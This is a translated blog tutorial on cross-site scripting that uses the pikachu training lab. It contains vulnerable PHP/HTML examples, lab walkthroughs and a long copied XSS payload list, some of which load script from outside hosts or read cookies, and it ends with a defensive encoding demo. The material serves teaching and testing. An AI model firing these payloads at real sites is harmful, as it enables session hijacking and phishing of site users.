This post uses the pikachu lab as the running example. For installing pikachu, see: [Network security - pikachu lab installation] A very detailed pikachu installation tutorial (lab code and tools provided), Aini's blog on CSDN: https://blog.csdn.net/m0_67844671/article/details/133682360?spm=1001.2014.3001.5502

1. What is an XSS vulnerability

XSS is short for Cross Site Scripting. The abbreviation was changed from CSS to XSS to avoid a clash with Cascading Style Sheets. It is one of the most common web application security vulnerabilities and appeared in the OWASP Top 10 at position 3 in 2013 and position 7 in 2017. In an XSS attack the attacker embeds client-side script (usually dangerous JavaScript) in a web page; when a user views that page, the script executes in the user's browser, which is where the attacker's goal is achieved.

The end goal of an XSS attack is to get malicious client-side script into the page. JavaScript is by far the most common attack language, but other scripting languages such as ActionScript and VBScript have been used. Since client-side scripting on today's web is essentially all JavaScript, serious XSS work requires a solid command of JavaScript.

(Figure: XSS vulnerability diagram)

2. Why XSS vulnerabilities occur

The program does not control input and output strictly enough: a malicious script is accepted as input and, when it is later output to the front end, the browser parses and executes it as legitimate code.

3. Impact of XSS

1. For a small corporate site that has not been updated in six months, an XSS bug is of almost no use to an attacker. In social platforms, mail systems, popular open-source web applications, forums, microblogs and similar services, the damage is severe.
2. Hijacking user cookies is the most common cross-site attack. A script written into the page (almost always JavaScript) runs in the victim's browser and sends the current session ID to a site or server controlled by the attacker.
3. Frame phishing. Because JavaScript can manipulate the DOM tree and page content, the script draws a fake page that tricks the user into entering data, and everything the user types is sent to the attacker's server.
4. Drive-by downloads and watering-hole attacks.
5. Limited keylogging.
And many more.

4. Classification of XSS

4-1 Reflected (medium/low severity)

The data is generally not stored in a database; the user's input is simply reflected back to the browser, one request at a time (what you send is what you see).

For example, the server below takes `name` and echoes it to the client unchanged:

```php
<?php
$name = $_GET['name'];
echo "Welcome $name<br>";
?>
```

Create `xss.php` on the server with this code and open it in the browser. It expects a `name` parameter, so pass any value, e.g. `xss.php?name=anything`. This code clearly has no SQL injection, but it does have XSS, because the parameter is neither filtered nor encoded before it is output.

Attack method: `<script>confirm(1)</script>`. (If the input lands inside a tag or attribute rather than in page text, prefix the closing characters, typically `">`, to close the current context first, then the script tag follows.) Type the payload into the parameter and press Enter to send the request; if a confirm dialog pops up, the JavaScript ran, the XSS vulnerability exists and the attack succeeded. This is only a quick verification: a functional script can do far more than pop a dialog.

There are many, many ways to write XSS payloads, because the target may filter or block the `script` tag; to attack it you change the vector, which is why the attack strings come in so many shapes.

Now the pikachu lab. Entering `aaa` in the reflected XSS page shows "who is aaa,I don't care!" on the page.
Since what we type is printed into the page, XSS is likely; try the payload `<script>confirm(1)</script>`. The payload is cut off: the front end limits the input length. This restriction is easy to bypass because it is only a `maxlength` attribute on the input element: open the developer tools, change the 20 to 200 directly in the element, press Enter, paste the payload again and click submit. The attack succeeds.

Compare the `<p>` element for normal output with the one after the payload:

normal output: `<p>who is aaa,I don't care!</p>`
after the payload: `<p>who is <script>confirm(1)</script>,I don't care!</p>`

The payload `<script>confirm(1)</script>` is inserted into the page as a real script element; that is how the malicious code is injected.

4-2 Persistent / stored (high severity)

Persistent XSS is also called stored XSS: the submitted data is written to the database, stored permanently, and the attack is therefore very stable.

Example payload: `<script>confirm(1)</script>`. After clicking OK in the dialog, only the remaining text is visible, because the script element itself renders nothing. The whole payload is now in the database; every time the page is opened, the data is read from the database and written into the page, and the visitor is attacked again. Refresh the page to confirm: the dialog appears every time. Because the code is stored and executes on every load for every user, stored XSS is rated as serious.

Looking at the back-end code shows why: the submitted payload is stored in the database and, each time the page is opened, read back and rendered into the page, where the malicious code executes.

```php
if(array_key_exists("message",$_POST) && $_POST['message']!=null){
    $message=escape($link, $_POST['message']);
    $query="insert into message(content,time) values('$message',now())";
    $result=execute($link, $query);
    if(mysqli_affected_rows($link)!=1){
        $html.="<p>数据库出现异常，提交失败！</p>"; // "Database error, submission failed!"
    }
}
```

Note that `escape()` only escapes the value for the SQL statement; it does nothing to make the value safe when it is later written into HTML, which is exactly the gap stored XSS exploits.

4-3 DOM-based (medium/low severity)

DOM XSS is formed through the front-end DOM nodes. In the code below there is no front-end/back-end interaction: the text box content is written straight into the page.

```html
<!DOCTYPE html>
<html>
<head>
<title>输入框提交示例</title>
<script>
function submitForm() {
  var inputText = document.getElementById("inputText").value;
  var result = document.getElementById("result");
  if (inputText.trim() === "") {
    result.innerText = "不能提交空内容";
  } else {
    result.innerText = inputText;
  }
}
</script>
</head>
<body>
<h1>输入框提交示例</h1>
<input type="text" id="inputText">
<button onclick="submitForm()">提交</button>
<p id="result"></p>
</body>
</html>
```

One caveat on this snippet: `innerText` assigns the value as text, not markup, so exactly as written it is not exploitable. The vulnerability appears when the value is written through a sink that parses HTML, such as `innerHTML` or `document.write`, which is what the pikachu DOM lab does.

Because it generally does not exchange data with the back-end server, DOM XSS is considered a medium/low severity vulnerability.

JavaScript sources and sinks that commonly lead to DOM XSS:

document.referrer
window.name
location
innerHTML
document.write

Closing the surrounding tag or attribute:

`' onclick='alert(1111)'`
`' onclick='alert("xss")'`
`<img src=# onmouseover="alert('xss')">`
`'></a><script>alert(1);</script>` (closes the lab's `<a href='...'>what do you see?</a>` link and adds a script element)

Example: entering normal content shows that it lands inside the `href` attribute of an `<a>` tag, so the goal is to close the `href` attribute. First attempt:

`xxx" onclick="alert(123)`

Syntactically this should close the attribute and add an `onclick`, but the attack fails: the lab's `href` is delimited by single quotes, so the double quote does not end the attribute value and the whole string stays inside `href` as plain text. Use the matching quote instead:

`xx' onclick='alert(123)`

Clicking the link now pops the dialog. The rendered markup after the attack is:

`<a href='xx' onclick='alert(123)'>what do you see?</a>`

5. Common XSS payloads

The list below is a fairly complete XSS payload collection taken from the following post, which is worth consulting: XSS-Payload大全 (gy1bubble's blog on CSDN).
Script tags and encoding tricks:

```html
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert(String.fromCharCode(88,83,83))</script>
<script language="JavaScript">alert('XSS')</script>
<ScRiPt>alert(1)</ScRiPt>
<script x>alert(1)</script 1=2
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script itworksinallbrowsers>/*<script* */alert(1)</script>
<script ^__^>alert(String.fromCharCode(49))</script ^__^
<script /**/ >/**/alert(1)/**/</script> /**/
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<script src=data:text/javascript,alert(1)></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?>
<ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
```

Breaking out of the surrounding context (title, textarea, select, script, style, JS string):

```html
'';!--"<XSS>=&{()}
</title><script>alert(1)</script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(document.cookie)</script>
</select><script>alert(123)</script>
</iframe><script>alert(123)</script>
</script><script>alert(1)</script>
"}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83));</SCRIPT>
'); alert('xss'); var x='
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
a="get";b="URL(\"";c="javascript:";d="alert('xss');\")";eval(a+b+c+d);
```

Event handlers on other elements (no script tag needed):

```html
<body oninput=javascript:alert(1)><input autofocus>
<BODY ONLOAD=alert('XSS')>
<body onload="while(true) alert('XSS');">
<body onunload="javascript:alert('XSS');">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<img src=x onerror=alert(1)>
<img src onerror=alert(1)>
<img src=foo.png onerror=alert(/xssed/) />
<img src=1.gif onerror=alert(1)>
<img src=x onerror="window.open('https://www.google.com/');">
<img/src onerror=this.onerror=confirm(1)>
<img src ?itworksonchrome?\/onerror = alert(1)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=x onerror=alert(String.fromCharCode(88,83,83))>
<svg/onload=alert(1)>
<svg onload=alert(1)>
<sVg><scRipt >alert(1)
<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script>
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input type=date onfocus=alert(1)>
<input/onmouseover="javaSCRIPT:confirm(1)"
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<h1/onmouseover='\u0061lert(1)'>
<div onmouseover="alert(1)">DIV</div>
<div/onmouseover='alert(1)'>X</div>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>
<h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
<iframe/onreadystatechange=alert(1)>
<var onmouseover="prompt(1)">On Mouse Over</var>
<blink/ onmouseover=prompt(1)>OnMouseOver
<marquee onstart=javascript:alert(1)>^__^
<marquee><h1>XSS</h1></marquee>
<marquee><script>alert('XSS')</script></marquee>
<style/onload=prompt('XSS')>
<style onload=alert(1)>
<a href="javascript:void(0)" onmouseover=javascript:alert(1)>X</a>
<a href=[] onmouseover=prompt(1)//>XYZ</a>
<div style=width:1px;filter:glow onfilterchange=alert(1)>x
```

The source list also enumerates `<IMG SRC=x on…=alert(String.fromCharCode(88,83,83))>` for every handler name (one line per event): onload, onafterprint, onbeforeprint, onbeforeunload, onerror, onhashchange, onmessage, ononline, onoffline, onpagehide, onpageshow, onpopstate, onresize, onstorage, onunload, onblur, onchange, oncontextmenu, oninput, oninvalid, onreset, onsearch, onselect, onsubmit, onkeydown, onkeypress, onkeyup, onclick, ondblclick, onmousedown, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onwheel, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onscroll, oncopy, oncut, onpaste, onabort, oncanplay, oncanplaythrough, oncuechange, ondurationchange, onemptied, onended, onloadeddata, onloadedmetadata, onloadstart, onpause, onplay, onplaying, onprogress, onratechange, onseeked, onseeking, onstalled, onsuspend, ontimeupdate, onvolumechange, onwaiting, onshow, ontoggle. Only the events the element actually fires (for `<img>`, essentially onerror/onload and the mouse/keyboard events) will trigger.

javascript:, data: and vbscript: URLs in src/href/data attributes:

```html
<a href="javascript:alert(document.cookie)">Click Here</a>
<a href="jAvAsCrIpT:alert(1)">X</a>
<form><a href="javascript:\u0061lert(1)">X
<a href="javascript:\u0061le%72t(1)"><button>
<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">X</a>
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a>
<a href="data:text/html;blabla,<script src=http://sternefamily.net/foo.js></script>">Click Me</a>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC="vbscript:msgbox('XSS')">
<IMG SRC="livescript:[code]">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<iframe src=javascript:alert('XSS')></iframe>
<iframe src="javascript:alert(document.location)">
<iframe// src=javaSCRIPT:alert(1)>
<iframe src="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29"></iframe>
<iframe srcdoc="<body onload=prompt(1)>">
<iframe/src="data:text/html,<svg onload=alert(1)>">
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<IFRAME SRC="http://hacker-site.com/xss.html">
<iframe src="http://xss.rocks/scriptlet.html">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<frameset onload=javascript:alert(1)>
<form><button formaction=javascript:alert(1)>CLICKME
<form><isindex formaction="javascript:confirm(1)"
<form action="javascript:alert(document.cookie)"><input type=submit>
<form><iframe src="javascript:alert(1)" ;>
<object data="javascript:\u0061le%72t(1)">
<object data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">
<object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
<embed src=javascript:alert(1)>
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always"></EMBED>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<math><maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction></math>
<math href="javascript:javascript:alert(1)">CLICKME</math>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<table background="javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<BASE HREF="javascript:alert('XSS');//">
<head><base href="javascript:///"></head><body><a href="/. /,alert(1)//#">XXX</a></body>
```

meta refresh, meta headers and charset tricks:

```html
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
```

CSS vectors (almost all of these depend on legacy IE `expression()`/`behavior` or old Gecko `-moz-binding` and do not work in current browsers):

```html
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
<div/style="width:expression(confirm(1))">X</div>
<font style="color:expression(alert(document.cookie))">
<div style="x:expression((window.r==1)?'':eval('r=1; alert(String.fromCharCode(88,83,83));'))">
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d>
<style>@import data:,*%7bx:expression(javascript:alert(1))%7D;</style>
<exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
```

Comments, CDATA, odd bytes and other parser quirks:

```html
<!--<img src="--><img src=x onerror=alert(1)//">
<comment><img src="</comment><img src=x onerror=alert(1)//">
<![><img src="]><img src=x onerror=alert(1)//">
<style><img src="</style><img src=x onerror=alert(1)//">
<!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<% foo><x foo="%><script>alert(1)</script>">
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
http://www.google<script .com>alert(document.location)</script>
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<div id="d"><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1)">
<img src=x\x09onerror="alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
```

The `\x..` entries stand for raw bytes; the source list repeats the three `<img>` shapes above (byte before `src`, byte between `src=x` and `onerror`, byte after `onerror=`) for each of \x00, \x09, \x10, \x11, \x12, \x13, \x32, \x34, \x39 and \x47, which older parsers treated as whitespace. The source also carries a vector of the form `<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('...')">` whose `document.write` argument is a fully `\uXXXX`-escaped `<iframe>` pointing at a base64 `data:image/svg+xml` document with `onload` handlers on several SVG elements.

Engine-specific JavaScript (old Firefox sharp variables, `__noSuchMethod__`, Opera, IE):

```html
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=alert/#0#/#0#(1)})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
<svg><script onlypossibleinopera:-)> alert(1)
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074(\u0061)>
```

Server-side, SSI, BBCode and non-HTML carriers:

```html
<?php echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
<script src="http://www.site.com/XSS.js"></script>
[color=red' onmouseover='alert(xss)]mouse over[/color]
[color=red width=expression(alert(123))][color]
```

URL obfuscation for the host part of a link:

```html
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt	p://6	6.000146.0x7.147/">XSS</A>
```
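To tie the reflected, stored and DOM labs together, here is an added example of my own (not code from the original post, from pikachu, or from the payload list above). It models the two injection contexts met in the walkthrough as plain string-building functions, each in its vulnerable form and a hardened form, so the break-out can be seen without a browser. The `<p>who is NAME,I don't care!</p>` and `<a href='VALUE'>what do you see?</a>` shapes follow the lab output quoted above; `activeMarkup` is a regex heuristic written for this demonstration, not an HTML parser, and the `stripScriptTags` blocklist is the kind of filter the text warns is easy to bypass.

```javascript
// Added example, not code from the original post or from the pikachu project.
// Assumptions: the markup shapes `<p>who is ...,I don't care!</p>` and
// `<a href='...'>what do you see?</a>` are reconstructed from the lab output
// described in the text, not copied from pikachu's source.

// Entity-encode the five characters that matter in HTML text and quoted
// attribute contexts. This is what the vulnerable PHP `echo` lines lack.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// The blocklist approach the text warns about: it only removes <script> tags,
// so any other vector (img/onerror, svg/onload, event handlers) passes through.
function stripScriptTags(s) {
  return String(s).replace(/<\/?script[^>]*>/gi, '');
}

// Reflected lab (HTML text context): the `message` parameter is echoed into a <p>.
function renderNoticeVulnerable(message) {
  return `<p>who is ${message},I don't care!</p>`;
}
function renderNoticeBlocklist(message) {
  return `<p>who is ${stripScriptTags(message)},I don't care!</p>`;
}
function renderNoticeSafe(message) {
  return `<p>who is ${encodeHtml(message)},I don't care!</p>`;
}

// DOM lab (single-quoted attribute context): input lands inside href='...'.
function buildLinkVulnerable(str) {
  return `<a href='${str}'>what do you see?</a>`;
}

// Hardened form. Encoding alone is not enough for href: an entity-encoded
// `javascript:alert(1)` is still a javascript: URL once the browser decodes
// the attribute, so the scheme is validated first and the value encoded after.
function buildLinkSafe(str) {
  const s = String(str).trim();
  // Allow http(s) URLs, single-slash relative paths, or a bare path segment.
  const allowed = /^(https?:\/\/|\/(?!\/)|[a-z0-9._~-]+$)/i.test(s);
  const href = allowed ? encodeHtml(s) : '#';
  return `<a href='${href}'>what do you see?</a>`;
}

// Heuristic used by the demo (not an HTML parser): element names, and on*=
// handlers that sit inside a real tag. Entity-encoded text never matches.
function activeMarkup(html) {
  const tags = [...html.matchAll(/<([a-z][a-z0-9]*)/gi)].map(m => m[1].toLowerCase());
  const handlers = [...html.matchAll(/<[a-z][^>]*?\s(on[a-z]+)\s*=/gi)].map(m => m[1].toLowerCase());
  return { tags, handlers };
}

// Payloads taken from the walkthrough above.
const SCRIPT_PAYLOAD = '<script>confirm(1)</script>';
const IMG_PAYLOAD = '<img src=x onerror=alert(1)>';
const ATTR_PAYLOAD = "xx' onclick='alert(123)";

// Runs every variant and returns the rendered markup with what the heuristic finds.
function demo() {
  const rows = [
    ['reflected, raw echo', renderNoticeVulnerable(SCRIPT_PAYLOAD)],
    ['reflected, <script> blocklist', renderNoticeBlocklist(IMG_PAYLOAD)],
    ['reflected, encoded', renderNoticeSafe(IMG_PAYLOAD)],
    ['dom, raw href', buildLinkVulnerable(ATTR_PAYLOAD)],
    ['dom, validated href', buildLinkSafe(ATTR_PAYLOAD)],
  ];
  return rows.map(([label, html]) => ({ label, html, ...activeMarkup(html) }));
}

for (const r of demo()) {
  console.log(r.label.padEnd(30), 'tags=' + r.tags.join(','), 'handlers=' + r.handlers.join(','));
}
```

Run it with `node` and compare the rows: the blocklist row still carries an `img` tag with an `onerror` handler, the encoded row carries only the `p`, and the validated `href` row falls back to `#` because the attacker string is neither a URL nor a path segment.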